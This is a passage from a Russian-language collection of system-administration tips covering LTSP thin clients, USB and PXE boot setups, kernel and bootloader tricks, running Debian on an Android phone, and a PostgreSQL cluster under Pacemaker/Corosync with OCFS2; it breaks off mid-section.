Шаги по установке сервера LTSP (Linux Terminal Server Project) для обеспечения работы тонких клиентов, пример справедлив для свежеустановленного десктоп-варианта Ubuntu с GNOME: 1) Установите ssh-сервер, который используется в LTSP для организации коммуникации между компьютерами: sudo apt-get install ssh 2) Установите LTSP сервер: sudo apt-get install ltsp-server-standalone 3) Создайте конфигурационные файлы для тонких клиентов: sudo ltsp-build-client 4) Установите поддержку сетевой файловой системы NFS: sudo apt-get install nfs-kernel-server 5) Установите TFTP-сервер: sudo apt-get install tftpd-hpa 6) Измените конфигурацию tftpd /etc/default/tftpd-hpa для работы в режиме "демона", изменив значение переменно RUN_DAEMON на RUN_DAEMON="yes". 7) Измените конфигурационный файл экспорта NFS /etc/exports, путем добавления строчки: /opt/ltsp *(ro,no_root_squash,async,no_subtree_check) 8) Отключите автоматическую загрузку tftpd в /etc/inetd.conf, закомментировав строку с tftp. 9) Перезапустите сервисы NFS, inetd и tftpd: sudo invoke-rc.d openbsd-inetd restart sudo invoke-rc.d nfs-kernel-server restart sudo invoke-rc.d tftpd-hpa restart 10) Измените конфигурацию DHCP /etc/ltsp/dhcpd.conf, например: authoritative; subnet 192.168.85.0 netmask 255.255.255.0 { range 192.168.85.70 192.168.85.230; option domain-name "office.digiton.ru"; option domain-name-servers 212.48.193.37, 212.48.193.36; option broadcast-address 192.168.85.255; option routers 192.168.85.1; option subnet-mask 255.255.255.0; option root-path "/opt/ltsp/i386"; if substring( option vendor-class-identifier, 0, 9 ) = "PXEClient" { filename "/ltsp/i386/pxelinux.0"; } else { filename "/ltsp/i386/nbi.img"; } } Подключаем файл конфигурации DHCP от LTSP к DHCP-серверу, в конец файла /etc/dhcp3/dhcpd.conf добавляем строку: include "/etc/ltsp/dhcpd.conf"; Включите XDMCP (X Display Manager control protocol): sudo cp /usr/share/doc/gdm/examples/custom.conf /etc/gdm/ После копирования добавьте в /etc/gdm/custom.conf: [xdmcp] Enable=true DisplaysPerHost=2 (может быть больше дисплеев зависит от количества мониторов на компьютер) 11) Перезапустите GDM: sudo restart gdm 12) Перезапустите dhcp: sudo invoke-rc.d dhcp3-server restart 13) Загрузите машины с тонкими клиентами, использовав сетевую загрузку PXE ("Preboot Execution Environment"). В будущем, после обновления сервера может потребоваться обновить ключи для ssh и образ ltsp: sudo ltsp-update-sshkeys sudo ltsp-update-image

Организация установки OpenBSD с USB Flash (доп. ссылка 1) [обсудить]

Задача: подготовить USB Flash (/dev/sd0) для установки с него OpenBSD. Создаем дисковые разделы на Flash: # fdisk -iy sd0 Writing MBR at offset 0. # disklabel -E sd0 Label editor (enter '?' for help at any prompt) выводим список разделов на экран > p m OpenBSD area: 63-4160835; size: 2031.6M; free: 0.0M # size offset fstype [fsize bsize cpg] c: 2035.0M 0 unused i: 2031.6M 63 MSDOS удаляем существующий раздел > d * добавляем слайс "a" > a a offset: [63] size: [4160772] FS type: [4.2BSD] выводим список разделов на экран > p m OpenBSD area: 63-4160835; size: 2031.6M; free: 0.0M # size offset fstype [fsize bsize cpg] a: 2031.6M 63 4.2BSD 2048 16384 1 c: 2035.0M 0 unused выходим и сохраняем изменения > q Write new label?: [y] y Создаем файловую систему: # newfs /dev/rsd0a/ Проверяем целостность созданной ФС # fsck -fp /dev/rsd0a И наблюдаем страшные ошибки: dev/rsd0a: BAD SUPER BLOCK: VALUES IN SUPER BLOCK DISAGREE WITH THOSE IN LAST ALTERNATE /dev/rsd0a: UNEXPECTED INCONSISTENCY; RUN fsck_ffs MANUALLY. Как ни странно решить эту проблему помогает предварительная чистка всего содержимого Flash: tr '\000' '\377' < /dev/zero | dd bs=16384 of=/dev/rsd0c Если fsck не показал каких-либо ошибок, монтируем созданный раздел и копируем на него ядро и компоненты базовой системы: # mount /dev/sd0a /mnt # cp /usr/mdec/boot /mnt # cp bsd.rd /mnt/bsd Устанавливаем загрузчик: # /usr/mdec/installboot -v /mnt/boot /usr/mdec/biosboot sd0 boot: /mnt/boot proto: /usr/mdec/biosboot device: /dev/rsd0c /mnt/boot is 3 blocks x 16384 bytes fs block shift 2; part offset 63; inode block 24, offset 936 using MBR partition 3: type 0xA6 offset 63 Создаем директорию вида "4.6/i386" и копируем в нее установочные файлы: # mkdir -p /mnt/4.6/i386 # cd /mnt/4.6/i386 # wget "ftp://ftp.openbsd.org/pub/OpenBSD/4.6/i386/*" Проверяем целостность загруженных данных # cd /mnt/4.6/i386 # for i in *; do grep -e "($i)" SHA256 >> ../sha ; done; # cksum -c ../sha || echo "FAILED!!!" Отмонтируем и еще раз проверяем: # umount /mnt # fsck -fp /dev/rsd0a /dev/rsd0a: 3 files, 3047 used, 964509 free (13 frags, 120562 blocks, 0.0% fragmentation) Установочный Flash готов. Для начала установки после загрузки Flash в ответ на приглашение "boot>" необходимо ввести "bsd.rd".

Загрузка нескольких iso-образов с одного USB Flash c файловой системой VFAT (доп. ссылка 1) [комментарии]

В Grub2 появилась возможность прямой загрузки iso-образов с диска, что удобно использовать для организации загрузки нескольких LiveCD-дистрибутивов с USB Flash. Предположим, что USB Flash в системе виден как /dev/sdb Создаем на Flash файловую систему (если не создана): sudo mkfs.vfat -n "имя метки, 11 cимволов" /dev/sdb1 Монтируем: mount /dev/sdb1 /mnt/ Устанавливаем загрузчик Grub2 (если в системе Grub1, можно загрузиться, например, с последней версии Ubuntu LiveCD): grub-install --no-floppy --root-directory=/mnt /dev/sdb Создаем файл конфигурации Grub /mnt/boot/grub/grub.cfg (в примере перенос через "\" нужно объединить в одну строку): menuentry "Ubuntu Live 9.10 32bit" { loopback loop /boot/iso/ubuntu-9.10-desktop-i386.iso linux (loop)/casper/vmlinuz boot=casper iso-scan/filename=/boot/iso/ubuntu-9.10-desktop-i386.iso noeject noprompt -- initrd (loop)/casper/initrd.lz } menuentry "Grml small 2009.10" { loopback loop /boot/iso/grml-small_2009.10.iso linux (loop)/boot/grmlsmall/linux26 findiso=/boot/iso/grml-small_2009.10.iso apm=power-off \ lang=us vga=791 boot=live nomce noeject noprompt -- initrd (loop)/boot/grmlsmall/initrd.gz } menuentry "tinycore" { loopback loop /boot/iso/tinycore_2.3.1.iso linux (loop)/boot/bzImage -- initrd (loop)/boot/tinycore.gz } menuentry "partmagic" { loopback loop /boot/iso/pmagic-3.4.iso linux (loop)/pmagic/bzImage iso_filename=/boot/iso/pmagic.iso load_ramdisk=1 prompt_ramdisk=0 \ ramdisk_size=25000 root=/dev/ram0 livecd boot=live quiet vga=791 noeject noprompt sleep=0 tmpfs_size=220M initrd (loop)/pmagic/initramfs } menuentry "Netinstall 32 preseed" { loopback loop /boot/iso/mini.iso linux (loop)/linux auto url=http://www.panticz.de/pxe/preseed/preseed.seed locale=en_US \ console-setup/layoutcode=de netcfg/choose_interface=eth0 debconf/priority=critical -- initrd (loop)/initrd.gz } menuentry "debian-installer-amd64.iso" { loopback loop /boot/iso/debian-installer-amd64.iso linux (loop)/linux vga=normal -- initrd (loop)/initrd.gz } Создаем директорию /mnt/boot/iso и копируем в нее упомянутые в конфигурации iso-образы: mkdir /mnt/boot/iso wget http://ftp.uni-kl.de/pub/linux/ubuntu.iso/9.10/ubuntu-9.10-desktop-i386.iso -P /mnt/boot/iso ... Отмонтируем Flash и пробуем загрузиться umount /mnt/

Мгновенная перезагрузка Linux при помощи kexec [комментарии]

В репозиториях Debian/Ubuntu/Fedora/RHEL можно найти пакет kexec-tools, дающий возможность быстрой перезагрузки через обновление ядра в памяти, без задействования фазы с участием BIOS. Ставим kexec-tools в Debian/Ubuntu: apt-get install kexec-tools После установки пакета автоматически при перезагрузке будет использован вызов kexec. Чтобы отключить kexec необходимо в файле конфигурации /etc/default/kexec установить LOAD_KEXEC=false В RHEL/Fedora установка производится аналогичным способом: yum install kexec-tools Замена текущего ядра в ручном режиме. Читаем ядро в память: kexec -l /boot/vmlinuz --initrd=/boot/initrd.img --command-line="`cat /proc/cmdline`" Переводим управление на загруженное на прошлом этапе ядро: kexec -e

Добавление драйвера в образ сетевой установки (PXE) CentOS 5.X Автор: Victor Leschuk [обсудить]

Бывают ситуации, когда самый простой способ поставить систему на машину - с использование PXE сервера и FTP/HTTP/NFS. В случае, если в загрузочном образе для PXE отсутствует необходимый драйвер для сетевой карты или SCSI придется его добавлять вручную, пересобирая рамдиск. В данном примере будем добавлять драйвер atl1 в образ Centos 5.3. Далее приведен краткий список шагов и команд. 1. Определение нужного устройства. Загружаемся с PXE и видим, что не обнаружилась сетевая карта Берем образ любой Linux системы, грузимся с него и смотрим вывод lspci. В нашем случае сетевой карточкой оказалось устройство 1969:1048 - сетевая карточка Atheros. Драйвер для этого устройства - atl1e. 2. Собираем на какой-либо машине модуль под то ядро, которое присутствует в образе. Узнать версию, не загружаясь, можно например так: dd if=vmlinuz bs=512 count=1|xxd В моем случае это 2.6.18-128.el5 x86_64. На сборочной машине пакет gcc должен быть той же версии, которой собиралось ядро (здесь это gcc-4.1). Собирается модуль примерно так: # cd /usr/src/kernels/2.6.18-128.el5-x86_64/ # make modules M=/usr/src/atl1-1.2.40.2-1.nodist.rf/ ... LD [M] /usr/src/atl1-1.2.40.2-1.nodist.rf/atl1.ko Здесь /usr/src/atl1-1.2.40.2-1.nodist.rf - директория с исходными кодами модуля, а /usr/src/kernels/2.6.18-128.el5-x86_64/ - с исходными кодами ядра (необходимо поставить соответствующий пакет kernel-devel). 3. Распаковываем рамдиск и добавляем туда модуль: $ mkdir unpack $ cd $_ $ gunzip < /var/lib/tftpboot/centos53/initrd.img | cpio -i --make-directories $ cd modules $ mkdir tmp $ cd $_ $ gunzip < ../modules.cgz|cpio -i --make-directories $ cd 2.6.18-128.el5/x86_64/ $ cp /path/to/atl1.ko . $ cd ../../../ $ mv modules.cgz ~/modules.cgz.saved $ find ./tmp/2.6.18-128.el5/ -print | cpio -o -Hnewc|gzip -c9 > modules.cgz $ rm -rf ./tmp 4. Теперь надо добавить информацию о модуле в файлы modules.alias и module-info: $ /sbin/modinfo /path/to/atl1.ko |grep alias alias: pci:v00001969d00001048sv*sd*bc*sc*i* $ echo $(/sbin/modinfo /path/to/atl1.ko |grep alias) atl1 >> modules.alias Прописываем информацию о модуле в файл module-info, чтобы потом можно было подгрузить драйвер из меню. Добавляем следующие строчки: atl1 eth "Atheros L1 Gigabit Ethernet Driver " 5. Запаковываем рамдиск: $ cd .. $ find . -print | cpio -o -Hnewc|gzip -c9 > ../initrd_updated.img 6. Правим конфигурацию pxelinux, подкладываем в папку с образами новый рамдиск и ставим систему.

Фиксация номеров устройств для нескольких одинаковых карт в Linux (доп. ссылка 1) Автор: silverghost [комментарии]

Проблема: Несколько DVB карт при перезагрузке менялись местами в произвольном порядке. Решение: зафиксировать эти карты на своих местах через написание udev правила. Итак, смотрим параметры каждой из карт: udevinfo -a -n /dev/dvb/adapter0/frontend0 looking at device '/class/dvb/dvb0.frontend0': KERNEL=="dvb0.frontend0" SUBSYSTEM=="dvb" DRIVER=="" looking at parent device '/devices/pci0000:00/0000:00:1e.0/0000:02:00.0': KERNELS=="0000:02:00.0" SUBSYSTEMS=="pci" DRIVERS=="b2c2_flexcop_pci" ATTRS{vendor}=="0x13d0" ATTRS{device}=="0x2103" ATTRS{subsystem_vendor}=="0x13d0" ATTRS{subsystem_device}=="0x2103" ATTRS{class}=="0x028000" ... Создаем файл /etc/udev/rules.d/10-local.rules с содержимым (фиксация по параметру "KERNELS"): SUBSYSTEM=="dvb", KERNELS=="0000:02:00.0", PROGRAM="/bin/sh -c 'K=%k; K=$${K#dvb}; printf dvb/adapter0/%%s $${K#*.}'", NAME="%c", GROUP="video" SUBSYSTEM=="dvb", KERNELS=="0000:02:02.0", PROGRAM="/bin/sh -c 'K=%k; K=$${K#dvb}; printf dvb/adapter1/%%s $${K#*.}'", NAME="%c", GROUP="video"

Смена стандартной заставки для меню GRUB в OpenSuse 11.0 (доп. ссылка 1) Автор: Arturius [комментарии]

Дано: Система Open Suse 11.0 Задача: Необходимо поставить более интересный и красивый выбор системы загрузок Grub. Решение: Открыть терминал. alt+f2 gnome-terminal или Xterm Получаем права суперпользователя su root Устанавливаем gfxboot, если он не установлен yast --install gfxboot Переходим в папку с загрузчиком cd /boot делаем бэкап cp message message.old создаём директорию mkdir messagetemp переходим в неё cd messagetemp распаковываем message cpio -iv < /boot/message Запускаем редактор vim gfxboot.cfg Затем нажимаем ins и редактируем, заменяем: penguin=0 на penguin=100 выходим из режима редактирования нажимая Esc, вводим команду :wq запаковываем ls | cpio -ov > /boot/message перезагружаемся и радуемся...

Как минимизировать проблемы при перезагрузке зависшего Linux (доп. ссылка 1) Автор: arsgeek.com [комментарии]

Если консоль зависла, машина работает, но не откликается на CTRL-ALT-BKSPC, ALT-CTRL-F1, CTRL-ALT-DEL и по сети зайти на машину тоже нет возможности. "ALT + SysReq + r" - перевести клавиатуру в Raw режим. "ALT + SysReq + s" - сбросить буферы FS на диск (может занять много времени, если система сильно загружена). "ALT + SysReq + e" - отправить сигнал завершения работы процессам. "ALT + SysReq + i" - принудительно убить процессы не желающие завершить работу по сигналу KILL. 'ALT + SysReq + u' - отмонтировать дисковые разделы. 'ALT + SysReq + b' - перезагрузить машину. PS. Клавиша SysReq совпадает с Print Screen.

Как, после сборки ядра Linux, инициализировать initrd (ядро падает при монтировании root раздела) (доп. ссылка 1) Автор: as [комментарии]

initrd - RAM-диск, инициализируемый загрузчиком, требуется для подключения модулей ядра, необходимых на этапе до монтирования root-раздела, (например, до монтирования нужно подгрузить - ext2/ext3/scsi модули). 1) man initrd - все изумительно описано; 2) после сборки ядра создаем новый initrd: mkinitrd /boot/initrd-2.4.21 2.4.21; 3) в /etc/lilo.conf: initrd=/boot/initrd-2.4.21 В mkinitrd сам initrd можно назвать как угодно, но второй параметр обязательно версия ядра.

Как создать файл устройства для монтирования раздела диска. [обсудить]

Linux IDE # Linux SCSI # FreeBSD 4 mknod /dev/hda b 3 0 # /dev/sda b 8 0 # /dev/ad0 b 116 0x00010002 mknod /dev/hda1 b 3 1 # /dev/sda1 b 8 1 # /dev/ad0s1 b 116 0x00020002 mknod /dev/hda2 b 3 2 # /dev/sda2 b 8 2 # /dev/ad0s1a b 116 0x00020000 mknod /dev/hdb b 3 64 # /dev/sdb b 8 16 # /dev/ad0s1b b 116 0x00020001 mknod /dev/hdb1 b 3 65 # /dev/sdb1 b 8 17 # /dev/ad0s1c b 116 0x00020002 mknod /dev/hdc b 22 0 # /dev/sdc b 8 32 # /dev/ad1s1a b 116 0x00020008 mknod /dev/hdd b 22 64 # /dev/sdd b 8 48 # /dev/da1s1a b 13 0x00020000

Как в Linux после kernel panic вместо ожидания действия оператора автоматически выполнять перезагрузку. [комментарии]

Добавьте в /etc/rc.d/rc.local: echo 1 > /proc/sys/kernel/panic Т.е. перезагрузка будет выполнена через 1 сек. после panic, если 0 - то не перезагружать а ждать.

Как в FreeBSD запретить свободный вход как root с консоли через boot -s [обсудить]

В /etc/ttys поменяйте secure на insecure в строке: console none unknown off secure

Как в FreeBSD при загрузке в single read-olny переключится в RW режим. [обсудить]

mount -u -w /

Запуск Linux на Android-телефоне с SD-карты без перепрошивки Автор: Павел Отредиез [комментарии]

В данной заметке рассказано как запустить ванильный Debian Linux на телефоне не прошивая его и не портя установленный Android. Мой подопытный аппарат Xiaomi Redmi note 11. Телефон не нужно рутовать, достаточно разблокировать загрузчик. Запускать будем с помощью fastboot (да для каждого запуска потребуется подключать телефон к компьютеру), а рутовую файловую систему будем подцеплять с SD-карты. Настройка среды Создадим рабочий каталог: mkdir ~/redmi11 cd ~/redmi11/ Скачаем нужное ПО: sudo apt install qemu-user-static sudo apt build-dep linux-source git clone https://android.googlesource.com/platform/system/tools/mkbootimg git clone https://android.googlesource.com/platform/prebuilts/gcc/linux-x86/aarch64/aarch64-linux-android-4.9 cd aarch64-linux-android-4.9 git switch android-msm-barbet-4.19-android12-qpr1 cd ~/redmi11/ , так же https://developer.android.com/tools/releases/platform-tools в каталог ./platform-tools. Пропишем для удобства работы пути в ./path.sh: export PATH=$PATH:$(pwd)/mkbootimg:$(pwd)/platform-tools Подключим пути в текущий bash: . path.sh Ядро В ядре, которое идёт в составе Android, выключены некоторые важные подсистемы, поэтому загрузиться с ним по-простому не получится и надо компилировать свою версию. Надо найти исходники ядра для своего телефона, для Xiaomi с этим почти нет проблем. git clone https://github.com/MiCode/Xiaomi_Kernel_OpenSource.git cd Xiaomi_Kernel_OpenSource/ git switch spes-r-oss Для моей версии отсутствовал каталог techpack, он должен был быть, и ядро не собиралось до конца. Я нашёл techpack в аналогичной версии исходников на GitHub. Надо сказать, что исходники ядра Xiaomi имеют много мелких ошибок, связанных с включением "" <> хидеров и прочего. Я их все муторно правил, пока не добился компиляции без ошибок. Получим конфиг ядра с телефона, для этого подключим его к компьютеру и выполним: adb shell zcat /proc/config.gz > .config Сделаем два скрипта - для конфигурации ядра и для компиляции. ./menuconfig.sh: PATH="$PATH:$HOME/redmi11/aarch64-linux-android-4.9/bin" ARCH=arm64 CROSS_COMPILE=aarch64-linux-android- make menuconfig ./build.sh: PATH="$PATH:$HOME/redmi11/aarch64-linux-android-4.9/bin" ARCH=arm64 CROSS_COMPILE=aarch64-linux-android- make -j 8 targz-pkg Теперь изменим кофигурацию ядра и скомпилируем его. Во-первых в нем отключена поддержка devtmpfs, включим её CONFIG_DEVTMPFS=y Включим виртуальные консоли: CONFIG_TTY=y CONFIG_VT=y CONFIG_CONSOLE_TRANSLATIONS=y CONFIG_VT_CONSOLE=y Фрэймбуфер: CONFIG_DRM_FBDEV_EMULATION=y CONFIG_FRAMEBUFFER_CONSOLE=y Чтобы консоль не заваливало сообщениями ядра: CONFIG_CONSOLE_LOGLEVEL_DEFAULT=4 CONFIG_CONSOLE_LOGLEVEL_QUIET=3 CONFIG_MESSAGE_LOGLEVEL_DEFAULT=3 ROOT файловая система Используем debootstrap для получения файловой системы: cd ~/redmi11/ mkdir rootfs sudo debootstrap --arch=arm64 stable ./rootfs http://mirror.yandex.ru/debian sudo chroot rootfs/ tasksel install gnome-desktop Скопируем полученное ядро в ./rootfs/boot и модули если есть в ./rootfs/lib/modules. Отредактируем ./rootfs/etc/fstab: LABEL=debian / ext4 rw,defaults,noatime,nodiratime 0 1 tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,mode=1777 Создадим initrd: sudo chroot rootfs/ apt install initramfs-tools sudo mount --bind /dev rootfs/dev sudo chroot rootfs/ update-initramfs -k all -c sudo umount rootfs/dev Теперь для удобства сделаем образ нашей файловой системы, для этого используем скрипт install.sh: #!/bin/sh mkdir -p mnt dd if=/dev/zero of=debian-arm64.ext4 bs=4096 count=2097152 #8Gb /sbin/mkfs.ext4 -L debian -O^has_journal debian-arm64.ext4 sudo mount -o loop debian-arm64.ext4 ./mnt sudo cp -ar ./rootfs/* ./mnt/ sudo umount ./mnt На SD карточке у меня два раздела - первый FAT32, и второй под Linux. Запишем образ на SD карточку: sudo dd if=debian-arm64.ext4 of=/dev/YourSD2 bs=512 status=progress sudo partprobe sudo resize2fs /dev/YourSD2 Запуск Для запуска нам нужно подготовить Android boot image, используем скрипт mkbootimg.sh: mkbootimg.py \ --header_version 3 \ --os_version 12.0.0 \ --os_patch_level 2023-04 \ --kernel ./rootfs/boot/vmlinuz-4.19.157-tiny \ --ramdisk ./rootfs/boot/initrd.img-4.19.157-tiny \ --cmdline 'console=tty0 quiet root=LABEL=debian rootwait' \ --board '' \ -o boot-debian.img Здесь мы запускаем ядро с rootfs с меткой "debian", как мы и делали образ файловой системы. Теперь собственно запуск. Подключим телефон к компьютеру и выполним (не бойтесь ничего не записывается на него): adb reboot bootloader fastboot boot boot-debian.img P.S. А с драйверами я не разобрался.

Как обновить код загрузчика в FreeBSD [комментарии]

Ставим boot-менеджер в MBR: boot0cfg /dev/ad0 или fdisk -B -b /boot/boot0 /dev/ad0 Обновляем boot-loader (boot1 и boot2): disklabel -B ad0s1

Кластерные технологии

Настройка СУБД PostgreSQL 13 под управлением Pacemaker/Corosync в Debian 11 Автор: Slonik [комментарии]

В статье расскажу про мой опыт настройки Postgresql для работы под контролем кластерной службы Pacemaker Под нагрузкой данное решение не проверялось, всегда делайте (и проверяйте) резервные копии. Для хранения базы данных будет рассмотрен пример использования кластерной файловой системе OCFS2. Версии ПО, использованные в примере:
OCFS2 - драйвер из ядра 5.10, утилиты ocfs2-tools - 1.8.6
Corosync - 3.1.2
Pacemaker - 2.0.5
Postgresql 13 В статье будет три типа кластеров:
кластер файловой системы OCFS2 - обеспечивает хранение файлов на общем диске и согласованную работу с ними
кластер Corosync/Pacemaker - обеспечивает отслеживание работы процессов СУБД, запуск виртуального ip-адреса СУБД
кластер баз данных Postgresql - набор баз, управляемых одним экземпляром работающего сервера СУБД Подготовка операционных систем Для устойчивой работы кластеров (OCFS2, Pacemaker/Corosync) необходимо как минимум три сервера. Сервера могут быть как физические так и виртуальные. Желательно, чтобы сервера имели одинаковые характеристики производительности. Я для демонстрации подготовил три виртуальные машины с помощью Qemu-KVM. Устанавливаем ОС Debian 11 на каждый из серверов в минимальной конфигурации. Настройка сети В примере у меня будут сервера с адресами:
node1 - ip 192.168.1.11
node2 - ip 192.168.1.12
node3 - ip 192.168.1.13 Имена узлов должны разрешаться в IP-адреса на каждом из серверов, для этого необходимо прописать сопоставление в файле /etc/hosts или создать записи на DNS-сервере. root:~# cat /etc/hosts 127.0.0.1 localhost 192.168.1.11 node1.local node1 192.168.1.12 node2.local node2 192.168.1.13 node3.local node3 В случае реальной реализации кластера, сетевых карт на каждом из серверов должно быть как минимум две - карты необходимо объединить в логическое устройство bonding или teaming. Физически карты должны подключаться к двум независимым коммутаторам. В примере у меня будет по одной сетевой карте на сервер. Настройка сетевого экрана Выполняем настройку экрана на каждом узле:
устанавливаем пакет для управления брандмауэром ufw
создаём разрешающие правила для ssh, postgres, узлов кластера
активируем правила root# apt install ufw root# ufw allow ssh root# ufw allow postgres root# ufw allow from 192.168.1.11 to any root# ufw allow from 192.168.1.12 to any root# ufw allow from 192.168.1.13 to any root# ufw enable Кластер OCFS2 для отслеживания работы узлов по-умолчанию использует протокол TCP порт 7777 (задаётся в файле /etc/ocfs2/cluster.conf), а Corosync - протокол UDP, порт 5405 (задаётся в файле /etc/corosync/corosync.conf), с учётом этого, можно настроить более тонкие правила брандмауэра: root# ufw allow proto tcp from 192.168.1.11 to any port 7777 root# ufw allow proto tcp from 192.168.1.12 to any port 7777 root# ufw allow proto tcp from 192.168.1.13 to any port 7777 root# ufw allow proto udp from 192.168.1.11 to any port 5405 root# ufw allow proto udp from 192.168.1.12 to any port 5405 root# ufw allow proto udp from 192.168.1.13 to any port 5405 Настройка дисковой системы На каждом сервере будет индивидуальный диск для системы (/dev/vda, 20 Гб) и общий диск на все сервера для хранения БД (/dev/vdb, 5 Гб): root# lsblk NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT vda 254:0 0 20G 0 disk ├─vda1 254:1 0 512M 0 part /boot/efi ├─vda2 254:2 0 18,5G 0 part / └─vda3 254:3 0 976M 0 part [SWAP] vdb 254:16 0 5G 0 disk /mnt/ocfs2clst Настройка кластерной файловой системы Для реального использования общий диск должен быть расположен на системе хранения данных, и подключатся к серверам по нескольким путям. Для демонстрации общий диск будет реализован с помощью средств Qemu-KVM. Настройка службы кластера ФС OCFS2 Настройка ядра Linux Необходимо изменить параметры ядра, чтобы сервер автоматически перезагружался при сбое кластерной ФС, для это нужно создать файл /etc/sysctl.d/10-ocfs2.conf kernel.panic_on_oops = 1 kernel.panic = 30 После применить параметры: root# systemctl restart systemd-sysctl Данные настройки указывают ядру Linux при возникновении сбоя (когда связь по сети пропала, но узел продолжает запись heartbeat сообщений на общий диск) автоматически перезагрузить узел через 30 секунд. Установка пакетов OCFS2 Устанавливаем пакеты на каждом из узлов root# apt install ocfs2-tools Настройка кластера ФС OCFS2 Все настройки кластера OCFS2 хранятся в файле /etc/ocfs2/cluster.conf. Нужно либо выполнить команды на каждом узле кластера, либо выполнить на одном узле и после скопировать файл /etc/ocfs2/cluster.conf на каждый узел, а после выполнить регистрацию и запуск. Создаём кластер (выполнить на каждом узле кластера) root# o2cb add-cluster ocfs2clst Добавляем узлы в кластер (выполнить на каждом узле кластера), имя узла должно совпадать с тем, что выдаёт команда hostname root# o2cb add-node --ip 192.168.1.11 --port 7777 --number 1 ocfs2clst node1 root# o2cb add-node --ip 192.168.1.12 --port 7777 --number 2 ocfs2clst node2 root# o2cb add-node --ip 192.168.1.13 --port 7777 --number 3 ocfs2clst node3 Регистрируем кластер (выполнить на каждом узле кластера) root# o2cb register-cluster ocfs2clst Включаем кластер (выполнить на каждом узле кластера) root# o2cb start-heartbeat ocfs2clst Выполняем настройку драйвера ФС (обязательно выполнить на каждом узле кластера) root# dpkg-reconfigure ocfs2-tools Запускать кластер OCFS2 (O2CB) во время загрузки компьютера?: Y Имя кластера, запускаемого во время загрузки компьютера: ocfs2clst Настройки драйвера хранятся в файле /etc/default/o2cb Содержимое файла: # O2CB_ENABLED: 'true' means to load the driver on boot. O2CB_ENABLED=true # O2CB_BOOTCLUSTER: If not empty, the name of a cluster to start. O2CB_BOOTCLUSTER=ocfs2clst # O2CB_HEARTBEAT_THRESHOLD: Iterations before a node is considered dead. O2CB_HEARTBEAT_THRESHOLD=31 # O2CB_IDLE_TIMEOUT_MS: Time in ms before a network connection is considered dead. O2CB_IDLE_TIMEOUT_MS=30000 # O2CB_KEEPALIVE_DELAY_MS: Max. time in ms before a keepalive packet is sent. O2CB_KEEPALIVE_DELAY_MS=2000 # O2CB_RECONNECT_DELAY_MS: Min. time in ms between connection attempts. O2CB_RECONNECT_DELAY_MS=2000 Создание ФС OCFS2 Можно создать разделы на кластерном томе и создавать ФС уже на разделе, но это добавит сложностей при расширении тома, так как придётся вручную править границы раздела с помощью parted/fdisk и после расширять ФС. Но у нас кластерный том планируется целиком отдать под работу СУБД Postgresql, поэтому ФС предлагаю создать сразу на всем томе (в примере это диск /dev/vdb). Выполняем форматирование общего тома на одном из узлов: root# mkfs.ocfs2 -L pg-data --cluster-name=ocfs2clst -N 5 -T datafiles --fs-feature-level=max-features --cluster-stack=o2cb /dev/vdb Описание параметров:
-L pg-data - метка ФС
--cluster-name=ocfs2clst - имя кластера OCFS2, который управляет ФС
-N 5 - максимальное количество узлов, которые могут работать одновременно с ФС, позже можно поменять с помощью tunefs.ocfs2, но рекомендуется создавать структуру заранее
-T datafiles - тип хранимых данных, может быть mail, datafiles, vmstore
--fs-feature-level=max-features - включаем все доступные возможности ФС, т.к. узлы у нас идентичные
--cluster-stack=o2cb - используем для управления ФС стандартный стек o2cb Проверяем, что метки новой ФС видны на всех узлах кластера: root# blkid /dev/vdb /dev/vdb: LABEL="pg-data" UUID="ce92b1e7-30cb-4883-9a92-57c986f76acd" BLOCK_SIZE="4096" TYPE="ocfs2" Вывод команды blkid на всех узлах кластера должен совпадать. Выполняем пробное монтирование Монтирование выполняется 20-30 секунд, так как требует согласования по сети. Выполняем команды на всех узлах кластера. root# mkdir /mnt/ocfs2clst root# mount /dev/disk/by-uuid/ce92b1e7-30cb-4883-9a92-57c986f76acd /mnt/ocfs2clst Команда mounted.ocfs2 показывает на каких узлах смонтирована ФС. root# mounted.ocfs2 -f Device Stack Cluster F Nodes /dev/vdb o2cb ocfs2clst node1, node2, node3 Создаём пробные файлы/папки в каталоге /mnt/ocfs2clst на одном из узлов и проверяем, что они видны на остальных узлах кластера OCFS2. Размонтируем ФС на каждом узле: root# umount /mnt/ocfs2clst Расширение ФС OCFS2 Если потребуется увеличить размер хранилища:
Увеличиваем размер тома на СХД
Пересканируем том на сервере или перезагружаем узлы кластера
Расширяем ФС root# tunefs.ocfs2 -S /dev/vdb Добавление узла в кластер OCFS2 Если потребуется добавить ещё узел (например, node4, с ip 192.168.1.14) в кластер OCFS2, то необходимо выполнить команду на каждом узле: root# o2cb_ctl -C -i -n node4 -t node -a number=4 -a ip_address=192.168.1.14 -a ip_port=7777 -a cluster=ocfs2clst Необходимо заметить, что для обеспечения кворума, количество узлов должно быть нечётным. Установка PostgreSQL Устанавливаем пакеты на все узлы кластера: root# apt install postgresql Отключаем службу на каждом узле кластера, т.к. запуском СУБД будет управлять Pacemaker root# systemctl disable postgresql Настройка Pacemaker/Corosync Установка пакетов root# apt install pacemaker corosync crmsh fence-agents Настройка Corosync Служба Corosync обеспечивает обмен сообщениями между узлами кластера, с помощью неё отслеживается, что узлы работают корректно. А уже на основании информации о том какие узлы доступны, служба Pacemaker принимает решение о запуске сервисов (запуск виртуальных ip-адресов, монтирование файловых систем, запуск процессов СУБД). Настройки Corosync хранятся в файле /etc/corosync/corosync.conf. Рабочий пример файла указан ниже: # Please read the corosync.conf.5 manual page totem { version: 2 cluster_name: pgclst crypto_cipher: aes256 crypto_hash: sha256 } logging { fileline: off to_stderr: yes to_logfile: yes logfile: /var/log/corosync/corosync.log to_syslog: yes debug: off logger_subsys { subsys: QUORUM debug: off } } quorum { provider: corosync_votequorum } nodelist { node { name: node1 nodeid: 1 ring0_addr: 192.168.1.11 } node { name: node2 nodeid: 2 ring0_addr: 192.168.1.12 } node { name: node3 nodeid: 3 ring0_addr: 192.168.1.13 } } Включение шифрования сообщений Corosync Для повышения безопасности можно включить шифрование служебных сообщений при обмене между узлами кластера. Для этого на одном из узлов необходимо выполнить команду: root# corosync-keygen Она создаст файл /etc/corosync/authkey, этот файл необходимо скопировать на другие узлы кластера. root@node1:~# scp /etc/corosync/authkey root@node2:/etc/corosync/authkey root@node1:~# scp /etc/corosync/authkey root@node3:/etc/corosync/authkey В файле настроек /etc/corosync/corosync.conf необходимо задать параметры crypto_cipher и crypto_hash в секции totem: totem { ... crypto_cipher: aes256 crypto_hash: sha256 ... } Если вам необходимо разместить файл-ключ по не стандартному пути, то 